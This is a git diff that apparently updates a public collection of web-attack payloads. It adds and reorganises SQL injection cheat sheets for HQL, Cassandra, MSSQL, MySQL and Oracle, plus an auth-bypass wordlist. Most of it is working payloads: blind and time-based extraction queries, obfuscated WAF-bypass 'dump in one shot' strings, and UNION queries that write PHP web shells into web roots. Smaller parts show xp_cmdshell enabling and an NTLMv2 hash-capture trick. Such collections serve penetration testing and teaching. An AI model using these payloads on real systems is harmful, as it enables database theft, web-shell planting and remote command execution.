+* [Race Condition allows to redeem multiple times gift cards which leads to free "money" - @muon4](https://hackerone.com/reports/759247)
+* [Turbo Intruder: Embracing the billion-request attack - James Kettle | 25 January 2019](https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack)
+* [Race Condition Bug In Web App: A Use Case - Mandeep Jadon](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e)
\ No newline at end of file
diff --git a/SAML Injection/README.md b/SAML Injection/README.md
index 928b56eb..e244bfd1 100644
--- a/SAML Injection/README.md	
+++ b/SAML Injection/README.md	
@@ -161,7 +161,7 @@ The SAML response is accepted by the service provider. Due to the vulnerability,
 
 An XSLT can be carried out by using the `transform` element.
 
-![http://sso-attacks.org/images/4/49/XSLT1.jpg](http://sso-attacks.org/images/4/49/XSLT1.jpg)
+![http://sso-attacks.org/images/4/49/XSLT1.jpg](http://sso-attacks.org/images/4/49/XSLT1.jpg)    
 Picture from [http://sso-attacks.org/XSLT_Attack](http://sso-attacks.org/XSLT_Attack)    
 
 ```xml
diff --git a/SQL Injection/Cassandra Injection.md b/SQL Injection/Cassandra Injection.md
index e66949ec..2396618f 100644
--- a/SQL Injection/Cassandra Injection.md	
+++ b/SQL Injection/Cassandra Injection.md	
@@ -2,6 +2,14 @@
 
 > Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system
 
+## Summary
+
+* [Cassandra comment](#cassandra-comment)
+* [Cassandra - Login Bypass](#cassandra---login-bypass)
+  * [Login Bypass 0](#login-bypass-0)
+  * [Login Bypass 1](#login-bypass-1)
+* [References](#references) 
+
 ## Cassandra comment
 
 ```sql
@@ -34,4 +42,4 @@ Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://h
 
 ## References
 
-* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)
\ No newline at end of file
+* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)
diff --git a/SQL Injection/HQL Injection.md b/SQL Injection/HQL Injection.md
new file mode 100644
index 00000000..6e8168be
--- /dev/null
+++ b/SQL Injection/HQL Injection.md	
@@ -0,0 +1,58 @@
+# Hibernate Query Language Injection 
+
+> Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia
+## Summary
+
+* [HQL Comments](#hql-comments)
+* [HQL List Columns](#hql-list-columns)
+* [HQL Error Based](#hql-error-based)
+* [References](#references)
+
+## HQL Comments
+
+```sql
+HQL does not support comments
+```
+
+## HQL List Columns
+
+```sql
+from BlogPosts
+where title like '%'
+  and DOESNT_EXIST=1 and ''='%' -- 
+  and published = true
+```
+
+Using an unexisting column will an exception leaking several columns names.
+
+```sql
+org.hibernate.exception.SQLGrammarException: Column "DOESNT_EXIST" not found; SQL statement:
+      select blogposts0_.id as id21_, blogposts0_.author as author21_, blogposts0_.promoCode as promo3_21_, blogposts0_.title as title21_, blogposts0_.published as published21_ from BlogPosts blogposts0_ where blogposts0_.title like '%' or DOESNT_EXIST='%' and blogposts0_.published=1 [42122-159]
+```
+
+## HQL Error Based
+
+```sql
+from BlogPosts
+where title like '%11'
+  and (select password from User where username='admin')=1
+  or ''='%'
+  and published = true
+```
+
+Error based on value casting.
+
+```sql
+Data conversion error converting "d41d8cd98f00b204e9800998ecf8427e"; SQL statement:
+select blogposts0_.id as id18_, blogposts0_.author as author18_, blogposts0_.promotionCode as promotio3_18_, blogposts0_.title as title18_, blogposts0_.visible as visible18_ from BlogPosts blogposts0_ where blogposts0_.title like '%11' and (select user1_.password from User user1_ where user1_.username = 'admin')=1 or ''='%' and blogposts0_.published=1
+```
+
+:warning: **HQL does not support UNION queries**
+
+## References
+
+* [HQL for pentesters - February 12, 2014 - Philippe Arteau](https://blog.h3xstream.com/2014/02/hql-for-pentesters.html)
+* [How to put a comment into HQL (Hibernate Query Language)? - Thomas Bratt](https://stackoverflow.com/questions/3196975/how-to-put-a-comment-into-hql-hibernate-query-language)
+* [HQL : Hyperinsane Query Language - 04/06/2015 - Renaud Dubourguais](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf)
+* [ORM2Pwn: Exploiting injections in Hibernate ORM - Nov 26, 2015 - Mikhail Egorov](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm)
+* [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/)
diff --git a/SQL Injection/Intruder/Auth_Bypass2.txt b/SQL Injection/Intruder/Auth_Bypass2.txt
index c909cd27..3881b4c7 100644
--- a/SQL Injection/Intruder/Auth_Bypass2.txt	
+++ b/SQL Injection/Intruder/Auth_Bypass2.txt	
@@ -117,4 +117,5 @@
 ' UNION select table_schema,table_name FROM information_Schema.tables;#
 admin' and substring(password/text(),1,1)='7
 ' and substring(password/text(),1,1)='7
-
+' or 1=1 limit 1 -- -+
+'="or'
diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md
index 0061badc..0e793653 100644
--- a/SQL Injection/MSSQL Injection.md	
+++ b/SQL Injection/MSSQL Injection.md	
@@ -1,5 +1,23 @@
 # MSSQL Injection
 
+## Summary
+
+* [MSSQL comments](#mssql-comments)
+* [MSSQL version](#mssql-version)
+* [MSSQL database name](#mssql-database-name)
+* [MSSQL List databases](#mssql-list-databases)
+* [MSSQL List columns](#mssql-list-columns)
+* [MSSQL List tables](#mssql-list-tables)
+* [MSSQL Extract user/password](#mssql-extract-userpassword)
+* [MSSQL Union Based](#mssql-union-based)
+* [MSSQL Error Based](#mssql-error-based)
+* [MSSQL Blind Based](#mssql-blind-based)
+* [MSSQL Time Based](#mssql-time-based)
+* [MSSQL Stacked query](#mssql-stacked-query)
+* [MSSQL Command execution](#mssql-command-execution)
+* [MSSQL UNC path](#mssql-unc-path)
+* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
+
 ## MSSQL comments
 
 ```sql
@@ -19,14 +37,14 @@ SELECT @@version
 SELECT DB_NAME()
 ```
 
-## MSSQL List Databases
+## MSSQL List databases
 
 ```sql
 SELECT name FROM master..sysdatabases;
 SELECT DB_NAME(N); — for N = 0, 1, 2, …
 ```
 
-## MSSQL List Column
+## MSSQL List columns
 
 ```sql
 SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
@@ -35,7 +53,7 @@ SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master.
 SELECT table_catalog, column_name FROM information_schema.columns
 ```
 
-## MSSQL List Tables
+## MSSQL List tables
 
 ```sql
 SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
@@ -45,7 +63,7 @@ SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master.
 SELECT table_catalog, table_name FROM information_schema.columns
 ```
 
-## MSSQL User Password
+## MSSQL Extract user/password
 
 ```sql
 MSSQL 2000:
@@ -137,6 +155,13 @@ EXEC sp_configure 'xp_cmdshell',1;
 RECONFIGURE;
 ```
 
+To interact with the MSSQL instance.
+
+```powershell
+sqsh -S 192.168.1.X -U sa -P superPassword
+python mssqlclient.py WORKGROUP/Administrator:password@192.168.1X -port 46758
+```
+
 ## MSSQL UNC Path
 
 MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.
diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md
index 5a63dd5c..85d43eb7 100644
--- a/SQL Injection/MySQL Injection.md	
+++ b/SQL Injection/MySQL Injection.md	
@@ -3,10 +3,10 @@
 ## Summary
 
 * [MYSQL Comment](#mysql-comment)
-* [Detect columns number](#detect-columns-number)
 * [MYSQL Union Based](#mysql-union-based)
-    * [Extract database with information_schema](#extract-database-with-information-schema)
-    * [Extract data without information_schema](#extract-data-without-information-schema)
+    * [Detect columns number](#detect-columns-number)
+    * [Extract database with information_schema](#extract-database-with-information_schema)
+    * [Extract columns name without information_schema](#extract-columns-name-without-information_schema)
     * [Extract data without columns name](#extract-data-without-columns-name)
 * [MYSQL Error Based](#mysql-error-based)
     * [MYSQL Error Based - Basic](#mysql-error-based---basic)
@@ -15,13 +15,17 @@
 * [MYSQL Blind](#mysql-blind)
     * [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent)
     * [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement)
-    * [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set)
+    * [MYSQL Blind with MAKE_SET](#mysql-blind-with-make_set)
     * [MYSQL Blind with LIKE](#mysql-blind-with-like)
 * [MYSQL Time Based](#mysql-time-based)
+    * [Using SLEEP in a subselect](#using-sleep-in-a-subselect)
+    * [Using conditional statements](#using-conditional-statements)
 * [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot)
 * [MYSQL Current queries](#mysql-current-queries)
 * [MYSQL Read content of a file](#mysql-read-content-of-a-file)
 * [MYSQL Write a shell](#mysql-write-a-shell)
+    * [Into outfile method](#into-outfile-method)
+    * [Into dumpfile method](#into-dumpfile-method)
 * [MYSQL UDF command execution](#mysql-udf-command-execution)
 * [MYSQL Truncation](#mysql-truncation)
 * [MYSQL Out of band](#mysql-out-of-band)
@@ -42,17 +46,76 @@
 
 ## MYSQL Union Based
 
-### Extract database with information_schema
+### Detect columns number
 
-First you need to know the number of columns, you can use `order by`.
+First you need to know the number of columns
+
+##### Using `order by` or `group by`
+
+Keep incrementing the number until you get a False response.
+Even though GROUP BY and ORDER BY have different funcionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query.
 
 ```sql
-order by 1
-order by 2
-order by 3
-...
-order by XXX
+1' ORDER BY 1--+	#True
+1' ORDER BY 2--+	#True
+1' ORDER BY 3--+	#True
+1' ORDER BY 4--+	#False - Query is only using 3 columns
+                        #-1' UNION SELECT 1,2,3--+	True
 ```
+or 
+```sql
+1' GROUP BY 1--+	#True
+1' GROUP BY 2--+	#True
+1' GROUP BY 3--+	#True
+1' GROUP BY 4--+	#False - Query is only using 3 columns
+                        #-1' UNION SELECT 1,2,3--+	True
+```
+##### Using `order by` or `group by` Error Based
+Similar to the previous method, we can check the number of columns with 1 request if error showing is enabled.
+```sql
+1' ORDER BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+
+
+# Unknown column '4' in 'order clause'
+# This error means query uses 3 column
+#-1' UNION SELECT 1,2,3--+	True
+```
+or
+```sql
+1' GROUP BY 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+
+
+# Unknown column '4' in 'group statement'
+# This error means query uses 3 column
+#-1' UNION SELECT 1,2,3--+	True
+```
+##### Using `UNION SELECT` Error Based
+This method works if error showing is enabled
+```sql
+1' UNION SELECT @--+        #The used SELECT statements have a different number of columns
+1' UNION SELECT @,@--+      #The used SELECT statements have a different number of columns
+1' UNION SELECT @,@,@--+    #No error means query uses 3 column
+                            #-1' UNION SELECT 1,2,3--+	True
+```
+##### Using `LIMIT INTO` Error Based
+This method works if error showing is enabled.
+
+It is useful for finding the number of columns when the injection point is after a LIMIT clause.
+```sql
+1' LIMIT 1,1 INTO @--+        #The used SELECT statements have a different number of columns
+1' LIMIT 1,1 INTO @,@--+      #The used SELECT statements have a different number of columns
+1' LIMIT 1,1 INTO @,@,@--+    #No error means query uses 3 column
+                              #-1' UNION SELECT 1,2,3--+	True
+```
+##### Using `SELECT * FROM SOME_EXISTING_TABLE` Error Based
+This works if you know the table name you're after and error showing is enabled.
+
+It will return the amount of columns in the table, not the query.
+
+```sql
+1' AND (SELECT * FROM Users) = 1--+ 	#Operand should contain 3 column(s)
+                                        # This error means query uses 3 column
+                                        #-1' UNION SELECT 1,2,3--+	True
+```
+### Extract database with information_schema
 
 Then the following codes will extract the databases'name, tables'name, columns'name.
 
@@ -148,11 +211,11 @@ Shorter to read:
 Works with `MySQL >= 5.1`
 
 ```sql
-AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
-AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
-AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--
-AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))--
-AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
+?id=1 AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
+?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
+?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--
+?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))--
+?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
 ```
 
 ## MYSQL Blind
@@ -165,8 +228,33 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)
 ?id=1 and left(version(),1)=4
 ?id=1 and ascii(lower(substr(Version(),1,1)))=51
 ?id=1 and (select mid(version(),1,1)=4)
+?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A'
+?id=1 AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'
 ```
 
+### MySQL Blind SQL Injection in ORDER BY clause using a binary query and REGEXP
+
+This query basically orders by one column or the other, depending on whether the EXISTS() returns a 1 or not.
+For the EXISTS() function to return a 1, the REGEXP query needs to match up, this means you can bruteforce blind values character by character and leak data from the database without direct output.
+
+```
+[...] ORDER BY (SELECT (CASE WHEN EXISTS(SELECT [COLUMN] FROM [TABLE] WHERE [COLUMN] REGEXP "^[BRUTEFORCE CHAR BY CHAR].*" AND [FURTHER OPTIONS / CONDITIONS]) THEN [ONE COLUMN TO ORDER BY] ELSE [ANOTHER COLUMN TO ORDER BY] END)); -- -
+```
+
+### MySQL Blind SQL Injection binary query using REGEXP.
+
+Payload:
+```
+' OR (SELECT (CASE WHEN EXISTS(SELECT name FROM items WHERE name REGEXP "^a.*") THEN SLEEP(3) ELSE 1 END)); -- -
+```
+
+Would work in the query (where the "where" clause is the injection point):
+```
+SELECT name,price FROM items WHERE name = '' OR (SELECT (CASE WHEN EXISTS(SELECT name FROM items WHERE name REGEXP "^a.*") THEN SLEEP(3) ELSE 1 END)); -- -';
+```
+
+In said query, it will check to see if an item exists in the "name" column in the "items" database that starts with an "a". If it will sleep for 3 seconds per item.
+
 ### MYSQL Blind using a conditional statement
 
 TRUE: `if @@version starts with a 5`:
@@ -204,24 +292,80 @@ SELECT cust_code FROM customer WHERE cust_name LIKE 'k__l';
 
 ## MYSQL Time Based
 
+The following SQL codes will delay the output from MySQL.
+
 ```sql
 +BENCHMARK(40000000,SHA1(1337))+
 '%2Bbenchmark(3200,SHA1(1))%2B'
-' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
-
 AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))  //SHA1
 RLIKE SLEEP([SLEEPTIME])
 OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
+```
 
-?id=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) --
-?id=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) --
+### Using SLEEP in a subselect
+
+```powershell
+1 and (select sleep(10) from dual where database() like '%')#
+1 and (select sleep(10) from dual where database() like '___')# 
+1 and (select sleep(10) from dual where database() like '____')#
+1 and (select sleep(10) from dual where database() like '_____')#
+1 and (select sleep(10) from dual where database() like 'a____')#
+...
+1 and (select sleep(10) from dual where database() like 's____')#
+1 and (select sleep(10) from dual where database() like 'sa___')#
+...
+1 and (select sleep(10) from dual where database() like 'sw___')#
+1 and (select sleep(10) from dual where database() like 'swa__')#
+1 and (select sleep(10) from dual where database() like 'swb__')#
+1 and (select sleep(10) from dual where database() like 'swi__')#
+...
+1 and (select sleep(10) from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%')#
+```
+
+### Using conditional statements
+
+```sql
+?id=1 AND IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) --
+?id=1 AND IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) --
+?id=1 OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
 ```
 
 ## MYSQL DIOS - Dump in One Shot
 
 ```sql
 (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
+
 (select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
+
+-- SecurityIdiots
+make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
+
+-- Profexer
+(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)
+
+-- Dr.Z3r0
+(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@))
+
+-- M@dBl00d
+(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
+
+-- Zen
++make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
+
+-- Zen WAF
+(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)
+
+-- ~tr0jAn WAF
++concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0) from(information_schema./**/columns)where(table_schema=database()) and(0x00)in(@x:=Concat/*!(@x, 0x3c62723e, if( (@tbl!=table_name), Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1, 2, 0x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e), 0x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/+
+
+-- ~tr0jAn Benchmark
++concat(0x3c666f6e7420636f6c6f723d7265643e3c62723e3c62723e7e7472306a416e2a203a3a3c666f6e7420636f6c6f723d626c75653e20,version(),0x3c62723e546f74616c204e756d626572204f6620446174616261736573203a3a20,(select count(*) from information_schema.schemata),0x3c2f666f6e743e3c2f666f6e743e,0x202d2d203a2d20,concat(@sc:=0x00,@scc:=0x00,@r:=0,benchmark(@a:=(select count(*) from information_schema.schemata),@scc:=concat(@scc,0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d7265643e,LPAD(@r:=@r%2b1,3,0x30),0x2e20,(Select concat(0x3c623e,@sc:=schema_name,0x3c2f623e) from information_schema.schemata where schema_name>@sc order by schema_name limit 1),0x202028204e756d626572204f66205461626c657320496e204461746162617365203a3a20,(select count(*) from information_Schema.tables where table_schema=@sc),0x29,0x3c2f666f6e743e,0x202e2e2e20 ,@t:=0x00,@tt:=0x00,@tr:=0,benchmark((select count(*) from information_Schema.tables where table_schema=@sc),@tt:=concat(@tt,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e,LPAD(@tr:=@tr%2b1,3,0x30),0x2e20,(select concat(0x3c623e,@t:=table_name,0x3c2f623e) from information_Schema.tables where table_schema=@sc and table_name>@t order by table_name limit 1),0x203a20284e756d626572204f6620436f6c756d6e7320496e207461626c65203a3a20,(select count(*) from information_Schema.columns where table_name=@t),0x29,0x3c2f666f6e743e,0x202d2d3a20,@c:=0x00,@cc:=0x00,@cr:=0,benchmark((Select count(*) from information_schema.columns where table_schema=@sc and table_name=@t),@cc:=concat(@cc,0x3c62723e,0x3c666f6e7420636f6c6f723d707572706c653e,LPAD(@cr:=@cr%2b1,3,0x30),0x2e20,(Select (@c:=column_name) from information_schema.columns where table_schema=@sc and table_name=@t and column_name>@c order by column_name LIMIT 1),0x3c2f666f6e743e)),@cc,0x3c62723e)),@tt)),@scc),0x3c62723e3c62723e,0x3c62723e3c62723e)+
+
+-- N1Z4M WAF
++/*!13337concat*/(0x3c616464726573733e3c63656e7465723e3c62723e3c68313e3c666f6e7420636f6c6f723d22526564223e496e6a6563746564206279204e315a344d3c2f666f6e743e3c68313e3c2f63656e7465723e3c62723e3c666f6e7420636f6c6f723d2223663364393361223e4461746162617365207e3e3e203c2f666f6e743e,database/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223306639643936223e56657273696f6e207e3e3e203c2f666f6e743e,@@version,0x3c62723e3c666f6e7420636f6c6f723d2223306637363964223e55736572207e3e3e203c2f666f6e743e,user/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223306639643365223e506f7274207e3e3e203c2f666f6e743e,@@port,0x3c62723e3c666f6e7420636f6c6f723d2223346435613733223e4f53207e3e3e203c2f666f6e743e,@@version_compile_os,0x2c3c62723e3c666f6e7420636f6c6f723d2223366134343732223e44617461204469726563746f7279204c6f636174696f6e207e3e3e203c2f666f6e743e,@@datadir,0x3c62723e3c666f6e7420636f6c6f723d2223333130343362223e55554944207e3e3e203c2f666f6e743e,UUID/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223363930343637223e43757272656e742055736572207e3e3e203c2f666f6e743e,current_user/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223383432303831223e54656d70204469726563746f7279207e3e3e203c2f666f6e743e,@@tmpdir,0x3c62723e3c666f6e7420636f6c6f723d2223396336623934223e424954532044455441494c53207e3e3e203c2f666f6e743e,@@version_compile_machine,0x3c62723e3c666f6e7420636f6c6f723d2223396630613838223e46494c452053595354454d207e3e3e203c2f666f6e743e,@@CHARACTER_SET_FILESYSTEM,0x3c62723e3c666f6e7420636f6c6f723d2223393234323564223e486f7374204e616d65207e3e3e203c2f666f6e743e,@@hostname,0x3c62723e3c666f6e7420636f6c6f723d2223393430313333223e53797374656d2055554944204b6579207e3e3e203c2f666f6e743e,UUID/**N1Z4M**/(),0x3c62723e3c666f6e7420636f6c6f723d2223613332363531223e53796d4c696e6b20207e3e3e203c2f666f6e743e,@@GLOBAL.have_symlink,0x3c62723e3c666f6e7420636f6c6f723d2223353830633139223e53534c207e3e3e203c2f666f6e743e,@@GLOBAL.have_ssl,0x3c62723e3c666f6e7420636f6c6f723d2223393931663333223e42617365204469726563746f7279207e3e3e203c2f666f6e743e,@@basedir,0x3c62723e3c2f616464726573733e3c62723e3c666f6e7420636f6c6f723d22626c7565223e,(/*!13337select*/(@a)/*!13337from*/(/*!13337select*/(@a:=0x00),(/*!13337select*/(@a)/*!13337from*/(information_schema.columns)/*!13337where*/(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=/*!13337concat*/(@a,table_schema,0x3c666f6e7420636f6c6f723d22726564223e20203a3a203c2f666f6e743e,table_name,0x3c666f6e7420636f6c6f723d22726564223e20203a3a203c2f666f6e743e,column_name,0x3c62723e))))a))+
+
+-- sharik
+(select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=concat(@a,table_name,0x203a3a20,column_name,0x3c62723e))))a)
 ```
 
 ## MYSQL Current queries
@@ -251,18 +395,32 @@ GRANT FILE ON *.* TO 'root'@'localhost'; FLUSH PRIVILEGES;#
 
 ## MYSQL Write a shell
 
+### Into outfile method
+
 ```sql
-SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
-SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>
--1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
+[...] UNION SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
+[...] UNION SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>'
 [...] UNION SELECT 1,2,3,4,5,0x3c3f70687020706870696e666f28293b203f3e into outfile 'C:\\wamp\\www\\pwnd.php'-- -
 [...] union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
 ```
 
+### Into dumpfile method
+
+```sql
+[...] UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
+[...] UNION SELECT 0x3c3f7068702073797374656d28245f4745545b2763275d293b203f3e INTO DUMPFILE '/var/www/html/images/shell.php';
+```
+
 ## MYSQL Truncation
 
 In MYSQL "`admin `" and "`admin`" are the same. If the username column in the database has a character-limit the rest of the characters are truncated. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed.
 
+```sql
+`username` varchar(20) not null
+```
+
+Payload: `username = "admin               a"`
+
 ## MYSQL UDF command execution
 
 First you need to check if the UDF are installed on the server.
@@ -318,4 +476,5 @@ load data infile '\\\\error\\abc' into table database.table_name;
 - [SQL Truncation Attack - Warlock](https://resources.infosecinstitute.com/sql-truncation-attack/)
 - [HackerOne @ajxchapman 50m-ctf writeup - Alex Chapman @ajxchapman](https://hackerone.com/reports/508123)
 - [SQL Wiki - netspi](https://sqlwiki.netspi.com/injectionTypes/errorBased)
-- [ekoparty web_100 - 2016/10/26 - p4-team](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100)
\ No newline at end of file
+- [ekoparty web_100 - 2016/10/26 - p4-team](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100)
+- [Websec - MySQL - Roberto Salgado - May 29, 2013.](https://websec.ca/kb/sql_injection#MySQL_Default_Databases)
diff --git a/SQL Injection/OracleSQL Injection.md b/SQL Injection/OracleSQL Injection.md
index 0228cd9d..633e24c7 100644
--- a/SQL Injection/OracleSQL Injection.md	
+++ b/SQL Injection/OracleSQL Injection.md	
@@ -1,5 +1,18 @@
 # Oracle SQL Injection
 
+## Summary
+
+* [Oracle SQL version](#oracle-sql-version)
+* [Oracle SQL database name](#oracle-sql-database-name)
+* [Oracle SQL List databases](#oracle-sql-list-databases)
+* [Oracle SQL List columns](#oracle-sql-list-columns)
+* [Oracle SQL List tables](#oracle-sql-list-tables)
